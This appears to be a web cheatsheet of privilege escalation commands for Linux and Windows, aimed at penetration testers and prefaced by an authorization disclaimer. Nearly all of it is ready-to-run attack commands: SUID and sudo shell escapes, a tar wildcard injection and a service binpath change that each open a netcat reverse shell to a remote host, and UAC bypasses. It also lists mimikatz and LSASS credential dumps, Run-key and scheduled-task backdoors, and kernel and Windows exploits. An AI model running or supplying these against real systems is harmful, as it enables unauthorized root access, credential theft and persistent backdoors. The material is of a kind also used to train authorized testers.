Privilege Escalation Cheatsheet

Complete guide to privilege escalation techniques for Linux and Windows. Commands, exploits and methodologies for penetration testing.

Disclaimer

Only use these techniques on systems you have explicit authorization to test. Unauthorized access and privilege escalation are illegal and may result in serious legal consequences.

Linux

Windows

Useful Command Combinations

Linux Full Enum

Complete Linux system enumeration

uname -a && cat /etc/issue && id && sudo -l && getcap -r / 2>/dev/null && find / -perm -4000 2>/dev/null

SUID Quick Search

Quick search for interesting SUID binaries

find / -perm -4000 -type f 2>/dev/null | xargs ls -la

Windows Full Enum

Complete Windows system enumeration

systeminfo && whoami /all && net user && net localgroup administrators && sc query state=all

Service Exploit Check

Check vulnerable Windows services

wmic service get name,pathname,startmode | findstr /i "auto" | findstr /i /v "C:\Windows\"

Password Hunting Linux

Search passwords and credentials on Linux

grep -r "password" /home/ 2>/dev/null && cat ~/.bash_history | grep -i passw && env | grep -i pass

Password Hunting Windows

Search passwords and credentials on Windows

findstr /si password *.txt *.xml *.ini *.config && reg query HKLM /f password /t REG_SZ /s

System Enumeration

uname -a

Kernel and system info

uname -a

cat /etc/issue

Linux distribution

cat /etc/issue

cat /etc/*-release

OS version info

cat /etc/*-release

hostname

Host name

hostname

Current user info

whoami

Current username

whoami

Logged users

cat /etc/passwd

System users list

cat /etc/passwd | grep -v nologin

Sudo & Permissions

sudo -l

Available sudo commands

sudo -l

sudo -i

Interactive root shell

sudo -i

sudo -s

Shell with sudo privileges

sudo -s

sudo su -

Switch to root

sudo su -

cat /etc/sudoers

Sudoers configuration

cat /etc/sudoers

sudo LD_PRELOAD

LD_PRELOAD exploit

sudo LD_PRELOAD=/tmp/evil.so program

sudo python -c

Python shell with sudo

sudo python -c 'import os;os.system("/bin/bash")'

GTFOBins

Search sudo exploitable binaries

https://gtfobins.github.io/

SUID/SGID Binaries

find SUID

Find SUID files

find / -perm -4000 -type f 2>/dev/null

find SGID

Find SGID files

find / -perm -2000 -type f 2>/dev/null

find SUID+SGID

Find SUID and SGID

find / -perm -6000 -type f 2>/dev/null

find writable

Writable files non-root

find / -writable -type f 2>/dev/null | grep -v proc

nmap SUID

Exploit nmap interactive

nmap --interactive; !sh

vim SUID

Exploit vim/vi

vim -c ':!/bin/bash'

cp SUID

Copy /etc/passwd

cp /etc/passwd /tmp/passwd && echo "root2::0:0:::/bin/bash" >> /tmp/passwd

Linux Capabilities

getcap

List capabilities

getcap -r / 2>/dev/null

getcap binary

Check capabilities

getcap /usr/bin/python3.8

CAP_SETUID

Python CAP_SETUID exploit

python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'

CAP_DAC_READ_SEARCH

Read privileged files

tar -czvf /tmp/shadow.tar.gz /etc/shadow

setcap

Set capability

setcap cap_setuid+ep /usr/bin/python3

Cron Jobs

crontab -l

User cron jobs

crontab -l

cat /etc/crontab

System crontab

cat /etc/crontab

ls cron.d

Cron.d directory

ls -la /etc/cron.d/

cat cron.*

Periodic cron jobs

cat /etc/cron.daily/* /etc/cron.hourly/*

pspy

Monitor processes

./pspy64 -pf -i 1000

writable cron

Find writable cron jobs

find /etc/cron* -type f -writable 2>/dev/null

Services & Processes

ps aux

Active processes

ps aux | grep root

ps -ef

Full process list

ps -ef | grep -v \[

systemctl

Systemd services

systemctl list-units --type=service

netstat

Listening ports

netstat -tulpn | grep LISTEN

ss -tulpn

Socket statistics

ss -tulpn

service --status-all

Services status

service --status-all

Kernel Exploits

uname -r

Kernel version

uname -r

searchsploit

Search kernel exploits

searchsploit linux kernel 4.15

DirtyCow

CVE-2016-5195

gcc -pthread dirty.c -o dirty -lcrypt && ./dirty

linux-exploit-suggester

Suggest exploits

./linux-exploit-suggester.sh

LinEnum

Automated enumeration

./LinEnum.sh -t

Passwords & Credentials

cat /etc/shadow

Password hashes

cat /etc/shadow

unshadow

Combine passwd and shadow

unshadow /etc/passwd /etc/shadow > hashes.txt

john

John the Ripper

john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt

history

Command history

cat ~/.bash_history | grep -i passw

find passwords

Search password files

grep -r "password" /home/ 2>/dev/null

env

Environment variables

env | grep -i pass

ssh keys

SSH keys

find / -name id_rsa 2>/dev/null

Wildcard & Path Injection

tar wildcard

Tar wildcard exploit

echo "mkfifo /tmp/f;nc IP PORT 0</tmp/f|/bin/sh>/tmp/f 2>&1;rm /tmp/f" > shell.sh && chmod +x shell.sh && touch -- --checkpoint=1 --checkpoint-action=exec=sh\ shell.sh

chown wildcard

Chown wildcard

touch -- --reference=/root/file.txt

PATH injection

Hijack PATH

export PATH=/tmp:$PATH && echo "/bin/bash" > /tmp/ls && chmod +x /tmp/ls

Docker & Containers

docker group

Check docker group

groups | grep docker

docker privesc

Mount host filesystem

docker run -v /:/mnt --rm -it alpine chroot /mnt sh

docker ps

Active containers

docker ps -a

docker images

Available images

docker images

System Enumeration

systeminfo

System information

systeminfo

hostname

Computer name

hostname

whoami

Current user

whoami /all

net user

Users list

net user

net localgroup

Local groups

net localgroup administrators

netstat

Network connections

netstat -ano

ipconfig

Network configuration

ipconfig /all

route

Routing table

route print

Windows Services

sc query

Services list

sc query state=all

wmic service

WMIC service info

wmic service get name,pathname,startmode

icacls

File/dir permissions

icacls "C:\Program Files\Service"

accesschk

Check service permissions

accesschk.exe -uwcqv "Everyone" *

sc qc

Service config

sc qc VulnService

sc config

Modify service

sc config VulnService binpath= "C:\temp\nc.exe -nv IP PORT -e cmd.exe"

net start

Start service

net start VulnService

Registry & AutoRuns

reg query Run

AutoRun registry keys

reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run

reg query RunOnce

RunOnce registry

reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce

reg query AlwaysInstallElevated

AlwaysInstallElevated check

reg query HKLM\Software\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

reg add

Add registry key

reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Backdoor /t REG_SZ /d "C:\backdoor.exe"

UAC Bypass

eventvwr.exe

EventVwr UAC bypass

reg add HKCU\Software\Classes\mscfile\shell\open\command /ve /d "cmd.exe" /f

fodhelper.exe

FodHelper UAC bypass

reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /ve /d "cmd.exe" /f

computerdefaults

ComputerDefaults bypass

reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /ve /d "powershell.exe" /f

UACMe

Automated bypass tool

Akagi64.exe 23

Token Manipulation

whoami /priv

Current privileges

whoami /priv

incognito

Meterpreter incognito

load incognito; list_tokens -u

impersonate_token

Impersonate token

impersonate_token "NT AUTHORITY\SYSTEM"

SeImpersonatePrivilege

Potato exploits

JuicyPotato.exe -l 1337 -p c:\windows\system32\cmd.exe -t *

PrintSpoofer

PrintSpoofer exploit

PrintSpoofer.exe -i -c cmd

RoguePotato

RoguePotato exploit

RoguePotato.exe -r IP -e "cmd.exe"

Passwords & Credentials

cmdkey

Saved credentials

cmdkey /list

findstr password

Search passwords in files

findstr /si password *.txt *.xml *.ini

reg query HKLM

Passwords in registry

reg query HKLM /f password /t REG_SZ /s

SAM dump

Extract SAM hashes

reg save HKLM\SAM sam.hive && reg save HKLM\SYSTEM system.hive

mimikatz

Mimikatz dump

mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit"

lsass dump

Dump LSASS

procdump.exe -accepteula -ma lsass.exe lsass.dmp

unattend.xml

Passwords in unattend

type C:\Windows\Panther\Unattend.xml

Exploits & CVE

wes.py

Windows Exploit Suggester

wes.py systeminfo.txt

EternalBlue

MS17-010

use exploit/windows/smb/ms17_010_eternalblue

MS16-032

Secondary Logon Handle

Invoke-MS16032 -Command "cmd.exe"

MS15-051

Client Copy Image

ms15-051x64.exe "cmd.exe"

PrintNightmare

CVE-2021-1675

Invoke-Nightmare -DLL \\IP\share\nightmare.dll

DLL Hijacking

procmon

Process Monitor

procmon.exe /AcceptEula /Quiet

PATH DLL

DLL search order

echo %PATH%

missing DLL

Find missing DLLs

listdlls.exe -u | findstr "not found"

icacls writable

Writable directories

icacls "C:\Program Files\App" | findstr "(M)" | findstr "Everyone"

Scheduled Tasks

schtasks

List scheduled tasks

schtasks /query /fo LIST /v

taskschd.msc

Task Scheduler GUI

taskschd.msc

icacls task

Task file permissions

icacls C:\Tasks\backup.bat

schtasks create

Create scheduled task

schtasks /create /tn Backdoor /tr "C:\backdoor.exe" /sc onstart /ru System

No commands found for your search.